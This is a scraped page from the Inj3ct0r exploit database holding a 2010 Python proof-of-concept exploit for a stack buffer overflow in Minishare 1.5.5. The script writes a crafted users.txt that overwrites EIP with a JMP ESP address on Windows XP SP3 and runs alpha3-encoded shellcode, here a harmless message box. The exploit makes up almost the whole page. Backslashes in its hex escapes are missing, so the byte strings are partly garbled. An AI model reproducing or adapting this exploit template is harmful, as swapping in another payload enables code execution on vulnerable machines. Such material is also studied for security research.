[local exploits] - Minishare 1.5.5 Buffer Overflow Vulnerabi
Posted on 02 November 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt) | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt) by Chris Gabriel in local exploits | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>========================================================= Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt) ========================================================= # Exploit Title: Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt) # Date: 11/02/2010 # Author: Chris Gabriel # Software Link: http://sourceforge.net/projects/minishare # Version: 1.4.0 - 1.5.5 # Tested on: Windows XP SP3 EN # CVE: # MessageBoxA TITLE=HAX TEXT=HAX WIN XP SP3 Shellcode # xbbx48x41x58x00x53x89xe6x31xc0x50x56x56x50 # xb8xeax07x45x7exffxd0 # msfencoded MessageBoxA shellcode # [*] x86/shikata_ga_nai succeeded with size 48 (iteration=1) # x33xc9xb1x06xdaxd2xd9x74x24xf4x5bxb8x1fxf9 # xf2x17x83xebxfcx31x43x10x03x43x0fx1bx07xac # x67x9axb0xd3x24x95xa7xe5x0axf5x71x50xdax4e # x97x5bx9fxd0x97xb4 # ALPHA3.py x86 ascii uppercase ESP --input="shellcode-encoded" # alpha3 encoded ascii uppercase MessageBoxA Shellcode shellcode = ( "TYVTX10X41PZ41H4A4H1TA91TAFVTZ32PZNBFZDQE02D" "QF0D13DJE1F4847029R9VNN0D668M194A0I5G5L2G3W3" "M3Z19LN2A2Z1G0N2K0N4YK0JO9L9Q1S36403F0G3V2K1" "Q9S123I1Y3N9R8M4E0G" ) # 78 bytes till EIP # 82 bytes till ESP # 304 for payload # EIP OVERWRITE buff = "A" * 78 buff += "x4bx49x48x7e" #7E48494B JMP ESP in user32.dll win xp sp3 buff += shellcode try: f = open("users.txt",'w') f.write(buff) f.close() print "[+] Vulnerable file created! Place the 'users.txt' file in the Minishare directory and run the program... " except: print "[-] Error occured!" # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-11-02]</pre></body></html>
